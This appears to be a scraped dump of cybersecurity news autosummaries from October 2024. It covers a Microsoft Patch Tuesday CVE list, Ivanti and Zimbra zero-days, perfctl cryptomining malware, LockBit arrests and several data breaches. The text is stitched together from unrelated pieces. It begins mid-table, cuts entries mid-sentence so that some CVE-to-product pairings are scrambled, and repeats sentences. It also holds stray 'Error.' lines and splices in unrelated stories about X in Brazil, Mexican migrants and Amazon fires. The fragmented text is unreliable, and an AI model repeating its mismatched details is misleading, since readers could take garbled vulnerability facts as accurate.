(Chromium-based) CVE-2024-9369 Chromium: CVE-2024-9369 Insufficient data validation in Mojo Unknown Microsoft Edge (Chromium-based) CVE-2024-9370 Chromium: CVE-2024-9370 Inappropriate implementation in V8 Unknown Microsoft Edge (Chromium-based) CVE-2024-7025 Chromium: CVE-2024-7025 Integer overflow in Layout Unknown Microsoft Graphics Component CVE-2024-43534 Windows Graphics Component Information Disclosure Vulnerability Important Microsoft Graphics Component CVE-2024-43508 Windows Graphics Component Information Disclosure Vulnerability Important Microsoft Graphics Component CVE-2024-43556 Windows Graphics Component Elevation of Privilege Vulnerability Important Microsoft Graphics Component CVE-2024-43509 Windows Graphics Component Elevation of Privilege Vulnerability Important Microsoft Management Console CVE-2024-43572 Microsoft Management Console Remote Code Execution Vulnerability Important Microsoft Office CVE-2024-43616 Microsoft Office Remote Code Execution Vulnerability Important Microsoft Office CVE-2024-43576 Microsoft Office Remote Code Execution Vulnerability Important Microsoft Office CVE-2024-43609 Microsoft Office Spoofing Vulnerability Important Microsoft Office Excel CVE-2024-43504 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office SharePoint CVE-2024-43503 Microsoft SharePoint Elevation of Privilege Vulnerability Important Microsoft Office Visio CVE-2024-43505 Microsoft Office Visio Remote Code Execution Vulnerability Important Microsoft Simple Certificate Enrollment Protocol CVE-2024-43544 Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability Important Microsoft Simple Certificate Enrollment Protocol CVE-2024-43541 Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability Important Microsoft WDAC OLE DB provider for SQL CVE-2024-43519 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability Important Microsoft Windows Speech CVE-2024-43574 Microsoft Speech Application Programming Interface (SAPI)Windows Kerberos Information Disclosure Vulnerability Important Windows Kerberos CVE-2024-38129 Windows Kerberos Elevation of Privilege Vulnerability Important Windows Kernel CVE-2024-43502 Windows Kernel Elevation of Privilege Vulnerability Important Windows Kernel CVE-2024-43511 Windows Kernel Elevation of Privilege Vulnerability Important Windows Kernel CVE-2024-43520 Windows Kernel Denial of Service Vulnerability Important Windows Kernel CVE-2024-43527 Windows Kernel Elevation of Privilege Vulnerability Important Windows Kernel CVE-2024-43570 Windows Kernel Elevation of Privilege Vulnerability Important Windows Kernel CVE-2024-37979 Windows Kernel Elevation of Privilege Vulnerability Important Windows Kernel-Mode Drivers CVE-2024-43554 Windows Kernel-Mode Driver Information Disclosure Vulnerability Important Windows Kernel-Mode Drivers CVE-2024-43535 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important Windows Local Security Authority (LSA) CVE-2024-43522 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability Important Windows Mobile Broadband CVE-2024-43555 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43540 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43536 Windows Mobile Broadband Driver Remote Code Execution Vulnerability Important Windows Mobile Broadband CVE-2024-43538 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43525 Windows Mobile Broadband Driver Remote Code Execution Vulnerability Important Windows Mobile Broadband CVE-2024-43559 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43561 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43558 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43542 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43557 Windows Mobile Broadband Driver Denial of Service Vulnerability Important Windows Mobile Broadband CVE-2024-43526 Windows Mobile Broadband Driver Remote Code Execution Vulnerability Important Windows Mobile Broadband CVE-2024-43543 Windows Mobile Broadband Driver Remote Code Execution Vulnerability Important Windows Mobile Broadband CVE-2024-43523 Windows Mobile Broadband Driver Remote Code Execution Vulnerability Important Windows Mobile Broadband CVE-2024-43524 WindowsSpoofing Vulnerability Important Visual C++ Redistributable Installer CVE-2024-43590 Visual C++ Redistributable Installer Elevation of Privilege Vulnerability Important Visual Studio CVE-2024-43603 Visual Studio Collector Service Denial of Service Vulnerability Important Visual Studio Code CVE-2024-43488 Visual Studio Code extension for Arduino Remote Code Execution Vulnerability Critical Visual Studio Code CVE-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability Important Windows Ancillary Function Driver for WinSock CVE-2024-43563 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Important Windows BitLocker CVE-2024-43513 BitLocker Security Feature Bypass Vulnerability Important Windows Common Log File System Driver CVE-2024-43501 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important Windows Cryptographic Services CVE-2024-43546 Windows Cryptographic Information Disclosure Vulnerability Important Windows cURL Implementation CVE-2024-6197 Open Source Curl Remote Code Execution Vulnerability Important Windows EFI Partition CVE-2024-37982 Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability Important Windows EFI Partition CVE-2024-37976 Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability Important Windows EFI Partition CVE-2024-37983 Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability Important Windows Hyper-V CVE-2024-30092 Windows Hyper-V Remote Code Execution Vulnerability Important Windows Kerberos CVE-2024-43547Remote Code Execution Vulnerability Important Windows Scripting CVE-2024-43584 Windows Scripting Engine Security Feature Bypass Vulnerability Important Windows Secure Channel CVE-2024-43550 Windows Secure Channel Spoofing Vulnerability Important Windows Secure Kernel Mode CVE-2024-43516 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important Windows Secure Kernel Mode CVE-2024-43528 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important Windows Shell CVE-2024-43552 Windows Shell Remote Code Execution Vulnerability Important Windows Standards-Based Storage Management Service CVE-2024-43512 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important Windows Storage CVE-2024-43551 Windows Storage Elevation of Privilege Vulnerability Important Windows Storage Port Driver CVE-2024-43560 Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability Important Windows Telephony Server CVE-2024-43518 Windows Telephony Server Remote Code Execution Vulnerability Important Winlogon CVE-2024-43583 Winlogon Elevation of Privilege Vulnerability Important Update 9/11/24: Updated to explain that only three flaws were actively exploited and why CVE-2024-43491 was marked as exploited. "Autosummary:
Multiple Ivanti zero-days under active exploitation Last month, Ivanti warned that threat actors were chaining an admin bypass vulnerability (CVE-2024-8963) with a command injection bug (CVE-2024-8190) to bypass admin authentication and execute arbitrary commands on unpatched CSA appliances. "Autosummary:
Code comparison between GoldenUsbCopy and GoldenDealer Source: ESET GoldenUsbGo no longer uses AES-encrypted configuration but instead exfiltrates files based on hardcoded instructions, including recently (up to 14 days) modified files that are smaller than 20 MB and match specific types of content (keywords like "pass", "login", or "key") or certain file types (.pdf, .doc/.docx, .sh, .bat). "Autosummary:
Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "Ivanti has patched three additional Cloud Service Appliance (CSA) zero-day flaws, which have been exploited by attackers in conjuction with a zero-day bug the company accidentally fixed in September. The fixed zero-days “We are aware of a limited number of customers running CSA 4.6 patch 518 and prior who have been exploited when CVE-2024-9379, CVE-2024-9380 or CVE-2024-9381 are chained with CVE-2024-8963,” the company announced on Tuesday. CVE-2024-8963 is a path traversal vulnerability that allows a … More
The post Ivanti fixes three CSA zero-days exploited in the wild (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381) appeared first on Help Net Security.
"Autosummary:
Now, it seems three more have been added to the mix: CVE-2024-9379 – an SQL injection flaw that can be triggered by a remote authenticated attacker with admin privileges – an SQL injection flaw that can be triggered by a remote authenticated attacker with admin privileges CVE-2024-9380 – an OS command injection vulnerability that allows a remote authenticated attacker with admin privileges to achieve remote code execution – an OS command injection vulnerability that allows a remote authenticated attacker with admin privileges to achieve remote code execution CVE-2024-9381 – a path traversal vulnerability that allows a remote authenticated attacker with admin privileges to bypass restrictions The “limited exploitation” of these vulnerabilities Ivanti says it observed was limited to CSA 4.6 patch 518 and below – CVE-2024-9379, CVE-2024-9380 and CVE-2024-9381 have been discovered while the company investigated the initial attacks. "Autosummary:
"Autosummary:
A majority of the attacks targeted users in Russia, followed by Belarus, India, Uzbekistan, Kazakhstan, Germany, Algeria, the Czech Republic, Mozambique, and Turkey. "Autosummary:
The scanner was created by cybersecurity researcher Marcus Hitchins (aka "MalwareTech"), who created the scanner to help system administrators scan their networks and quickly identify devices running vulnerable CUPS-Browsed services. "Autosummary:
Date of birth Social Security Numbers Government-issued identification documents (e.g. driver’s licenses) Other identification documents (e.g. utility bills) Bank account numbers MoneyGram Plus Rewards numbers Transaction information (such as dates and amounts of transactions) Criminal investigation information (such as fraud) MoneyGram says that only a limited number of customers’ Social Security numbers and criminal investigation information was taken. Initial investigations show the type of information stolen varies between different individuals, but may include: Names Contact information (phone number, email, physical address) Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). About CVE-2024-43573 and CVE-2024-43572 As far as it can be deduced from the accompanying advisory, CVE-2024-43573 is similar to CVE-2024-38112, a vulnerability in MSHTML, a browser engine for the now deprecated Internet Explorer, which has … More
The post Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) appeared first on Help Net Security.
"Autosummary:
About CVE-2024-43573 and CVE-2024-43572 As far as it can be deduced from the accompanying advisory, CVE-2024-43573 is similar to CVE-2024-38112, a vulnerability in MSHTML, a browser engine for the now deprecated Internet Explorer, which has been expoited as a zero-day by the Void Banshee APT and patched by Microsoft in July 2024. "Autosummary:
"The decision to close X offices in Brazil was difficult," Musk, who also runs electric carmaker Tesla and rocket company SpaceX, wrote at the time. "Autosummary:
U.S. CISA adds Synacor Zimbra Collaboration flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 07, 2024 October 07, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Zimbra Collaboration vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)."As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)."" A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported.A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges."A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." "Thousands of Linux systems are likely infected with the highly elusive and persistent “perfctl” (or “perfcc“) cryptomining malware and many others still could be at risk of getting compromised, Aqua Security researchers revealed last week. “In all the attacks observed, the malware was used to run a cryptominer, and in some cases, we also detected the execution of proxy-jacking software,” they shared. “Perfctl” malware Though the actual cryptomining is performed by XMRIG Monero cryptomining software, … More
The post Linux systems targeted with stealthy “Perfctl” cryptomining malware appeared first on Help Net Security.
"Autosummary:
The “perfctl” attack flow (Source: Aqua Security) The malware: Contains and uses an exploit to CVE-2021-4034 (aka PwnKit) to attempt to gain full root privileges Modifies existing scripts to ensure execution of the malware and suppression of mesg errors (that might point to malicious execution), and drops a binary that verifies the execution of main payload Copies itself from memory to half a dozen other locations (with file names that mimic the names of conventional system files) Drops a rootkit to hide its presence and assure persistence, alter network traffic, etc. "Autosummary:
FBCS data breach impacted 238,000 Comcast customers Pierluigi Paganini October 07, 2024 October 07, 2024 238,000 Comcast customers were impacted by the FBCS data breach following the February ransomware attack, Comcast reports. According to the agency, compromised information may include names, dates of birth, Social Security numbers, and account information. "Autosummary:
"Autosummary:
Kyiv’s hackers launched an unprecedented cyber attack on Russian state media VGTRK on Putin’s birthday Pierluigi Paganini October 07, 2024 October 07, 2024 Russian state media VGTRK faced a major cyberattack, which a Ukrainian source claimed was conducted by Kyiv’s hackers. "Autosummary:
" According to LEGO Reddit moderator "mescad," the breach took place at 9 PM EST and lasted approximately 75 minutes until 10:15 PM ET, when the site was restored. "Autosummary:
"While an exact number has yet to be verified, FBI agents have identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data from what appears to be millions of potential victims around the world," the Department of Justice said in a press release at the time. "Autosummary:
In recent years, Qualcomm has also patched chipset vulnerabilities that could allow attackers to access users" media files, text messages, call history, and real-time conversations. "Autosummary:
The data breach occurred in February 2024 and the cybercriminals responsible for the incident gained access to: Full names Social Security Numbers (SSNs) Date of birth Account information and other provider information ID card and/or driver’s license Other state identification number Medical claims information Clinical information (including diagnosis/conditions, medications, and other treatment information), and/or health insurance information. "Autosummary:
Universal Music data breach impacted 680 individuals Pierluigi Paganini October 07, 2024 October 07, 2024 Universal Music Group notified hundreds of individuals about a data breach compromising their personal information. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: October 2024 Patch Tuesday forecast: Recall can be recalled October arrived, and Microsoft started the month by announcing the release of Windows 11 24H2. The preview versions of this release have been in the news due to many innovations and one controversial feature. Critical Zimbra RCE vulnerability under mass exploitation (CVE-2024-45519) Attackers are actively exploiting CVE-2024-45519, a critical Zimbra vulnerability … More
The post Week in review: Critical Zimbra RCE vulnerability exploited, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: September 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Absolute, anecdotes, ArmorCode, Binarly, Bitdefender, Druva, F5 Networks, Gcore, Guardsquare, Huntress, Ketch, LOKKER, Malwarebytes, NETGEAR, Nudge Security, Prompt Security, Rapid7, Revenera, Skyhigh Security, Strivacity, Tenable, Trellix, Vanta, Veritas Technologies, and Wing Security. New infosec products of the week: October 4, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Balbix, Halcyon, Metomic, Red Sift, SAFE Security, Veeam Software, and Legit Security. "Autosummary:
Last April this year, FBCS informed of a data breach determined to have occurred between February 14 and February 26, 2024, when threat actors breached its network and stole the following details from its electronic records: Full name Social Security Number (SSN) Date of birth Account information Driver"s license number or ID card The data breach was initially believed to have impacted 1.9 million people, but subsequent findings upped the tally to 3.2 million in June and, finally, 4.2 million individuals in July. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"After working with leading external cybersecurity experts, including CrowdStrike, and coordinating with U.S. law enforcement, the majority of our systems are now operational, and we have resumed money transfer services," says an email obtained by BleepingComputer. "Autosummary:
"The Red Barrels team regrets to announce that its internal IT systems were recently impacted by a cybersecurity event, involving access to some of its data," reads a statement on Red Barrel"s website. "Autosummary:
The site is involved in retrieving nuclear waste, fuel, and sludge from legacy ponds and silos, storing radioactive materials such as plutonium and uranium, managing spent nuclear fuel rods, and remediating and decommissioning nuclear facilities. "Autosummary:
Error. "Microsoft and the US Justice Department have seized over 100 domains used by Star Blizzard, a Russian nation-state threat actor. “Between January 2023 and August 2024, Microsoft observed Star Blizzard target over 30 civil society organizations – journalists, think tanks, and non-governmental organizations (NGOs) core to ensuring democracy can thrive – by deploying spear-phishing campaigns to exfiltrate sensitive information and interfere in their activities,” Steven Masada, Assistant General Counsel at Microsoft’s Digital Crimes Unit, explained. … More
The post 100+ domains seized to stymie Russian Star Blizzard hackers appeared first on Help Net Security.
"Autosummary:
"Off-the-shelf offensive security tools and poorly configured cloud environments create openings in the attack surface, according to Elastic. Adversaries are utilizing off-the-shelf tools Offensive security tools (OSTs), including Cobalt Strike and Metasploit, made up ~54% of observed malware alerts. The most prevalent malware family observed this year was Cobalt Strike, accounting for 27.02% of infections. Cobalt Strike is a very mature commercial post-exploitation framework with an experienced research and development team. It is so effective … More
The post Cybercriminals capitalize on poorly configured cloud environments appeared first on Help Net Security.
"Autosummary:
Malware families such as Gafgyt (3.12%), Mirai (2.09%), and Bedevil (1.84%) appeared less often than in prior years, which may be a reflection of attempts to neutralize botnets from propagating. "Autosummary:
"Autosummary:
This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information.New Perfctl Malware targets Linux servers in cryptomining campaign Pierluigi Paganini October 04, 2024 October 04, 2024 perfctl malware targets misconfigured Linux servers to deploy cryptocurrency miners and proxyjacking software in an ongoing campaign. "Autosummary:
"In response, a third-party cybersecurity forensic specialist was engaged, and an investigation was launched, which confirmed that the unauthorized activity was a form of ransomware," the school district said this week. "Ransomware attacks have seen a significant resurgence, disrupting multiple sectors and affecting global supply chains. Despite efforts to disrupt major ransomware groups, incidents continue to rise, signaling an ongoing and growing threat into 2024. In this Help Net Security round-up, industry experts discuss the rise in ransomware attacks, their impact on critical systems like Microsoft Active Directory, and the growing resilience of the threat despite ongoing mitigation efforts. Craig Birch, Technology Evangelist, and Principal Security … More
The post Ransomware activity shows no signs of slowing down appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Six migrants die after Mexico soldiers open fire Thousands of migrants enter Mexico every year hoping to reach the US Soldiers reported hearing explosions after which two officers opened fire, the statement said, adding they have been removed from their duties while an investigation is carried out. "AuthenticID released Velocity Checks, a new tool that integrates with its comprehensive identity verification and fraud prevention platform. The solution leverages biometric and document analysis to detect multiple identities for fraudulent activities in real-time. Fraudsters can use different names with the same image so that identical visual data (like headshots or biometric information) is paired with multiple identity documents or account registrations with differing names. Velocity Checks uses sophisticated image comparison algorithms to analyze ID … More
The post AuthenticID Velocity Checks detects fraudulent activities appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Andrius Popovas, Chief Risk Officer at Mano Bank, discusses the most prevalent AI-driven fraud schemes, such as phishing attacks and deepfakes. He explains how AI manipulates videos and audio to deceive victims and highlights key red flags to watch for. Popovas also outlines strategies for professionals to stay ahead of these scams and the role of governments in combating AI fraud. What types of AI-driven fraud schemes are most … More
The post Spotting AI-generated scams: Red flags to watch for appeared first on Help Net Security.
"Autosummary:
If lighting looks off, with harsh contrasts or mismatched shadows, it could be a sign of manipulation), blurriness (Edges, where the face is swapped, may appear blurred, distorted, or pixelated, especially if the transition between the fake and real parts is not smooth), audio anomalies (If the voice sounds robotic, lacks emotion, or doesn’t match the speaking style of the person being imitated, it could be a fake). Therefore, if you receive a video or audio call, you need to pay attention to these red flags: strange facial movements (Look for unnatural expressions, mismatched lip movements, or awkward eye movement), inconsistent lighting (Natural videos typically have consistent lighting across a scene. "Autosummary:
The indigenous chief, Ze Bajaga, says that the majority of these fires are arson, set by people who “no longer want the wellbeing of humanity, or nature”.Most fires here are illegally started by humans, according to scientists, the Federal Police, and the government: loggers and miners looking to exploit land in the Amazon, or farmers turning it into pasture. Dorismar Luiz Baruffi says there is still a lot of land to be cultivated in the Amazonas At the heart of his, and others’, argument is the belief more land should be productive, not just protected. Zé Bajaga, an indeigenous chief, says a lot of the fires are caused by arson In recent years, deforestation has slowed in the Amazon. "Autosummary:
Adeagbo "conspired with others to participate in multiple cyber-enabled BEC schemes that defrauded a North Carolina university of more than $1.9 million, and attempted to steal more than $3 million from victim entities in Texas, including local government entities, construction companies, and a Houston-area college," the DoJ said. "Autosummary:
In conjunction, authorities outed a Russian national named Aleksandr Ryzhenkov (aka Beverley, Corbyn_Dallas, G, Guester, and Kotosel) as one of the high-ranking members of the Evil Corp cybercrime group, while simultaneously painting him as a LockBit affiliate. "Autosummary:
Additional userland rootkits are also deployed, replacing the ldd, top, crontab, and lsof utilities with trojanized versions, again, preventing direct detection of the malware"s activities. Detecting and stopping perfctl Aqua Nautilus proposes several ways for detecting and stopping perfctl, which fall into four main categories: system monitoring, network traffic analysis, file and process integrity monitoring, and proactive mitigation. "Autosummary:
And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space. "Autosummary:
Australia, the UK, and the United States have additionally implemented sanctions against an individual that the NCA believes to be a highly active affiliate of LockBit (and who they also suspect of being strongly linked to another cybercrime group, Evil Corp.) 31-year-old Aleksandr Ryzhenkov, believed to reside in Russia, is wanted for his alleged involvement in a series of ransomware attacks and money laundering activities. "CVE-2024-29824, an unauthenticated SQL Injection vulnerability in Ivanti Endpoint Manager (EPM) appliances, is being exploited by attackers, the Cybersecurity and Infrastructure Security Agency has confirmed by adding the bug to its Known Exploited Vulnerabilities catalog. Ivanti did the same by updating the relevant security advisory to say that they are aware of a limited number of customers who have been exploited. Further details about the attacks are unavailable at this time. About CVE-2024-29824 CVE-2024-29824, reported … More
The post Critical Ivanti Endpoint Manager flaw exploited (CVE-2024-29824) appeared first on Help Net Security.
"Autosummary:
"Malwarebytes released new features for Browser Guard, its free browser extension for Chrome, Edge, Firefox, and Safari that blocks content identified as potentially unwanted and unsafe. Users will now receive a pop-up alert if a website was involved in a recent breach, offering the ability to click and scan their digital footprint to evaluate if private information was exposed. New Auto-Cookie Block empowers users to manage their privacy with ease by preventing the collection of … More
The post Malwarebytes Browser Guard updates block unwanted and unsafe content appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Threat groups exploiting this vulnerability include Bobry, Polyovki (infecting over 650 stores), Surki, Burunduki, Ondatry, Khomyaki, and Belki. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. "Autosummary:
The dropped stealer collects Telegram messenger configuration files, files with various extensions and from external media, data from browsers (Chrome, Opera, Yandex, Brave, Edge, etc.), as well as PowerShell usage logs and FileZilla and SSH configurations.Based on the accounts used to register Atera Agent and analyzed emails, researchers believe MuddyWater targeted the following types of organizations between October 2023 and April 2024: airlines, IT, telecommunications and pharmaceutical companies, automotive manufacturers, logistics companies, travel and tourism agencies, employment/immigration services, as well as small businesses. Hellhounds attacks Researchers at Positive Technologies have reported a continuation of attacks against Russian companies by the Hellhounds threat actor, with at least 48 companies attacked, including public sector, IT, aerospace, energy, transportation and logistics, and mining companies. Transparent Tribe attacks According to BlackBerry researchers, the threat actor Transparent Tribe (aka APT36, ProjectM, Mythic Leopard, Earth Karkaddan) is responsible for attacks carried out between late 2023 and April 2024 that targeted the Indian government, defense and aerospace sectors using cross-platform malware written in Python, Golang and Rust.The threat actor has targeted organizations in the government, telecoms, technology, aerospace, defense and utilities sectors in North America, Southeast Asia and Oceania, with other targets in Europe, Africa and elsewhere in Asia.The group also targeted organizations in Hong Kong, Malaysia, Laos, South Korea, the USA, Djibouti, Kenya, and Rwanda. Mustang Panda attacks In the first quarter of 2024, ESET researchers identified the presence of Chinese-language APT Mustang Panda (aka Stately Taurus, Bronze President, Earth Preta, HoneyMyte, Camaro Dragon, RedDelta)Since March 2024, Sapphire Werewolf has conducted more than 300 attacks against Russian organizations in the education, industrial, IT, military-industrial complex and aerospace sectors using the Amethyst stealer, which is based on the open-source program called SapphireStealer.Researchers associate Shedding Zmiy with the Cobalt ((ex)Cobalt) group, known since 2016, which, according to public reports, exclusively attacked credit and financial organizations, pursuing only material gain. RedJuliett attacks From November 2023 to April 2024, Insikt Group researchers identified cyber-espionage activities by RedJuliett targeting government, academic, technology (especially electronics), and diplomatic organizations in Taiwan. Moonstone Sleet attacks A new threat actor, dubbed Moonstone Sleet by Microsoft researchers (formerly tracked as Storm-1789), has been targeting individuals and organizations in the software, IT, education and defense industrial base sectors using social engineering tactics. SmallTiger malware attacks The AhnLab Security intelligence Center (ASEC) discovered cases where a downloader named SmallTiger was used to attack South Korean businesses, including defense contractors, automotive parts manufacturers, and semiconductor manufacturers, among other confirmed targets. "Autosummary:
"Autosummary:
"Autosummary:
Website administrators are strongly advised to move to the following versions (or later) as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec has provided a tool to check if their site is vulnerable and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here. "Autosummary:
"Autosummary:
The cellular baseband (i.e., modem) refers to a processor on the device that"s responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface. "Autosummary:
Dutch police breached by a state actor Pierluigi Paganini October 03, 2024 October 03, 2024 The Dutch government blames a “state actor” for hacking a police system, exposing the contact details of all police officers, according to the justice minister. "66% of cybersecurity professionals say their role is more stressful now than it was five years ago, according to ISACA. Major contributors to rising stress levels among cybersecurity professionals According to the data, the top reasons for increased stress among cybersecurity professionals are: An increasingly complex threat landscape (81%) Low budget (45%) Worsening hiring/retention challenges (45%) Insufficiently trained staff (45%) Lack of prioritization of cybersecurity risks (34%). In line with this sentiment around challenging threats, … More
The post Cybersecurity hiring slows, pros’ stress levels rise appeared first on Help Net Security.
"Autosummary:
Major contributors to rising stress levels among cybersecurity professionals According to the data, the top reasons for increased stress among cybersecurity professionals are: An increasingly complex threat landscape (81%) Low budget (45%) Worsening hiring/retention challenges (45%) Insufficiently trained staff (45%) Lack of prioritization of cybersecurity risks (34%). "Applied Cybersecurity Engineer (Center for Securing the Homeland) MITRE | USA | Hybrid – View job details As an Applied Cybersecurity Engineer (Center for Securing the Homeland), you will apply interdisciplinary competencies in secure systems architecture and design, security operations, threat actor behavior, risk assessment, and network security to address business and operational challenges, including those related to technical IT and OT systems as well as military and government operations. You will define requirements, develop … More
The post Cybersecurity jobs available right now: October 2, 2024 appeared first on Help Net Security.
"Autosummary:
Director Trust, Data Privacy Roku | United Kingdom | On-site – View job details As a Director Trust, Data Privacy, you will monitor and ensure compliance with regional (GDPR, ePrivacy, CCPA, CPRA, LGPD etc) privacy requirements across Roku’s engineering organizations.Applied Cybersecurity Engineer (Center for Securing the Homeland) MITRE | USA | Hybrid – View job details As an Applied Cybersecurity Engineer (Center for Securing the Homeland), you will apply interdisciplinary competencies in secure systems architecture and design, security operations, threat actor behavior, risk assessment, and network security to address business and operational challenges, including those related to technical IT and OT systems as well as military and government operations. Incident Response and Forensics Officer UnionBank of the Philippines | Philippines | On-site – View job details As a Incident Response and Forensics Officer, you will assist in the detection, analysis, and response to security incidents, including malware infections, unauthorized access attempts, and data breaches. Tech Lead for Cyber Defense Operation Center Stellantis | France | On-site – View job details As a Tech Lead for Cyber Defense Operation Center, you will be responsible for designing, implementing, and maintaining the CDOC architecture, tools, and workflows, as well as leading a team of security analysts and engineers. Senior Cyber Security Engineer CommScope | USA | Remote – View job details As a Senior Cyber Security Engineer, you will design, implement, maintain, monitor, and manage cyber security systems and controls. "Autosummary:
"While the postjournal feature may be optional or not enabled on most systems, it is still necessary to apply the provided patch to prevent potential exploitation," Ashish Kataria, a security architect engineer at Synacor, noted in a comment on September 19, 2024. "Autosummary:
Police arrested four new individuals linked to the LockBit ransomware operation Pierluigi Paganini October 02, 2024 October 02, 2024 An international police operation led to the arrest of four individuals linked to the LockBit ransomware group, including a developer. "Attackers are actively exploiting CVE-2024-45519, a critical Zimbra vulnerability that allows them to execute arbitrary commands on vulnerable installations. Proofpoint’s threat researchers say that the attacks started on September 28 – several weeks after Zimbra developers released patches for CVE-2024-45519 and other flaws, and a day after ProjectDiscovery’s analysts published a detailed technical write-up about the vulnerability and a PoC exploit to demonstrate the potential for local exploitation. Other researchers have published PoCs on GitHub … More
The post Critical Zimbra RCE vulnerability under mass exploitation (CVE-2024-45519) appeared first on Help Net Security.
"Autosummary:
About CVE-2024-45519 Zimbra Collaboration (by Synacor) is a widely used cloud-hosted collaboration software and email platform, with an email server and a web client component (for document sharing, chat, and videoconferencing). "The third phase of Operation Cronos, which involved officers from the UK National Crime Agency (NCA), the FBI, Europol and other law enforcement agencies, has resulted in the arrest of four persons for allegedly participating in the LockBit ransomware-as-a-service operation in various roles. “A suspected developer of LockBit was arrested at the request of the French authorities, while the British authorities arrested two individuals for supporting the activity of a LockBit affiliate,” Europol announced on … More
The post 4 new LockBit-related arrests, identities of suspected Evil Corp members, affiliates revealed appeared first on Help Net Security.
"Autosummary:
"Balbix unveild Balbix D3, the latest version of its exposure management platform. Packed with AI innovations, Balbix D3 is designed to help cybersecurity teams mitigate critical exposures faster than ever before, protecting organizations against emerging threats before attackers can exploit them. AI-powered Workflows to speed up risk burndown At the core of Balbix D3 lies a deep focus on mobilizing organizations for rapid cyber risk reduction. Using AI, Balbix D3 enables security and IT teams … More
The post Balbix D3 accelerates vulnerability mitigation appeared first on Help Net Security.
"Autosummary:
